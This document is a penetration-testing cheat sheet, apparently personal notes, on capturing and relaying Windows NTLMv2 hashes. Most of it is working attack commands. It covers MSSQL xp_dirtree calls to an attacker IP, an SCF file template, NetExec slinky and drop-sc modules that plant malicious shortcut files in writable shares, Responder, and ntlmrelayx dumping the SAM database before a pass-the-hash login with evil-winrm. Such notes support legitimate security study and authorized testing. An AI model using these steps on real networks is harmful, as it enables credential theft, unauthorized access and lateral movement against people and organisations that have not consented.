Stealing Hashes
A common technique for compromising accounts involves stealing NTLMv2 password hashes by tricking a user or system into authenticating with a malicious shared folder. This can be done using a shortcut file with an icon that points to the attacker's folder—when accessed, the system tries to load the icon, triggering authentication and sending the hash. The stolen hash can then be cracked with tools like Hashcat or relayed to impersonate the user.
Steal a Hash using MSSQL Database
- Run responder or smbserver using impacket:
sudo responder -I tun0
- Run one of them:
1> EXEC master..xp_dirtree '\\<TUN0-IP>\share\'
2> GO
# OR
1> EXEC master..xp_subdirs '\\<TUN0-IP>\share\'
2> GO
Steal Hash using SCF File (Scuffy Module)
This method doesn't work on Server 2019 and above. Instead try .lnk.
A Shell Command File (SCF) is a script file containing a series of commands for execution in a shell environment, typically used in Windows (with .scf extension) to perform specific tasks like opening folders or executing commands. It can be used for automation or shortcuts.
- Create a file called:
@Filename.scf - File content for above created file is:
[Shell]
Command=2
IconFile=\\TUN0\share\iconname.ico
[Taskbar]
Command=ToggleDesktop
- Start responder on attack-host.
- Wait and it will capture hashes in few minutes.
We can use NetExec's scuffy module for automation of this attack.
Steal Hash using LNK (Slinky Module)
NetExec's Slinky Module generates Windows shortcut files in all writable shares, with the icon attribute pointing to a specified server (defaulting to SMB) to trigger authentication and capture NTLM hashes.
To view the source code for the module, visit: Source Code
~ ❯ nxc smb -M slinky --options
[*] slinky module options:
# Highlighted are compulsory options
SERVER IP of the listening server (running Responder, etc)
NAME LNK file name written to the share(s)
ICO_URI Override full ICO path (e.g. http://192.168.1.2/evil.ico or \\\\192.168.1.2\\testing_path\\icon.ico)
SHARES Specific shares to write to (comma separated, e.g. SHARES=share1,share2,share3)
IGNORE Specific shares to ignore (comma separated, default: C$,ADMIN$,NETLOGON,SYSVOL)
CLEANUP Cleanup (choices: True or False)
Find Share with WRITE Permission
We first need to find a share where we have WRITE permissions with the user we have access to.
Note that in the scenario below, we have access to the internal network and are using our attack host, through proxychains, to perform all the attacks and steal hashes.
We can use nxc itself to find shares that current user has WRITE access to.
proxychains4 -q nxc smb 192.168.1.4 -u 'rezydev' -p 'Password123@' --shares
Once we find writable share(s) we can launch the attack:
proxychains4 -q nxc smb 192.168.1.4 -u 'rezydev' -p 'Password123@' -M slinky -o SERVER=<tun0-ip> NAME=workfolder
Once the above command has finished executing, it creates malicious .lnk shortcuts in the shared directories. We then run Responder to poison the network and listen for incoming authentication attempts in order to capture NTLMv2 hashes. We can use hashcat with mode 5600 to crack them.
sudo responder -I tun0
Note: Make sure that smb is enabled at /etc/responder/Responder.conf.
NTLM Relay Attack
Make sure LNK is still there, else NTLM Relay won't work.
We can also relay the NTLMv2 hash to another server with SMB Signing Disabled.
An NTLM relay attack exploits the NTLM authentication protocol to intercept and forward authentication requests to another system. Attackers can relay these requests to gain unauthorized access to network resources. The attack often targets vulnerable systems that do not implement proper signing (SMB Signing Disabled) or encryption for NTLM traffic.
# Extract targets with SMB Signing Disabled in a file
proxychains4 -q nxc smb 192.168.1.0/24 --gen-relay-list relay_list.txt
We’ll use ntlmrelayx with the relay list. If an account with local admin privileges is found, ntlmrelayx will automatically dump the SAM database, allowing us to attempt a pass-the-hash attack.
Make sure to stop responder before running following:
# relay_list.txt = 192.168.1.8 (another host than previous)
sudo proxychains4 -q python3 /opt/impacket/build/scripts-3.12/ntlmrelayx.py -tf relay_list.txt -smb2support --no-http
Wait until it dumps all the hashes. If we get hash for Administrator we can use evil-winrm for it:
proxychains4 -q evil-winrm -i 192.168.1.8 -u Administrator -H <HASH>
Cleanup of LNK
proxychains4 -q nxc smb 192.168.1.4 -u 'rezydev' -p 'Password123@' -M slinky -o NAME=workfolder CLEANUP=YES
Stealing Hashes using .searchConnector-ms and .library-ms (drop-sc Module)
More info: Here
The .searchConnector-ms and .library-ms files are trusted by Windows and can be used to force authentication. By linking them to remote locations like a WebDAV share, attackers can make these files fetch content or credentials from a remote server, potentially stealing sensitive information without the user's knowledge.
~ ❯ nxc smb -M drop-sc --options
[*] drop-sc module options:
# Highlighted are compulsory options
Technique discovered by @DTMSecurity and @domchell to remotely coerce an host to start WebClient service.
https://dtm.uk/exploring-search-connectors-and-library-files-on-windows/
Module by @zblurx
URL URL in the searchConnector-ms file, default https://rickroll
CLEANUP Cleanup (choices: True or False)
SHARE Specify a share to target
FILENAME Specify the filename used WITHOUT the extension searchConnector-ms (it's automatically added), default is "Documents"
We can now drop the file using the module:
proxychains4 -q nxc 192.168.1.4 -u 'rezydev' -p 'Password123@' -M drop-sc -o URL=\\\\TUN0-IP\\heker
When a user accesses the shared folder while ntlmrelayx is running in our attack-host, we can relay the authentication attempt to the target machine (where smb signing is disabled).
sudo proxychains4 -q python3 /opt/impacket/build/scripts-3.12/ntlmrelayx.py -tf relay_list.txt -smb2support --no-http
Cleanup of drop-sc Module
proxychains4 -q nxc smb 192.168.1.4 -u 'rezydev' -p 'Password123@' -M drop-sc -o CLEANUP=True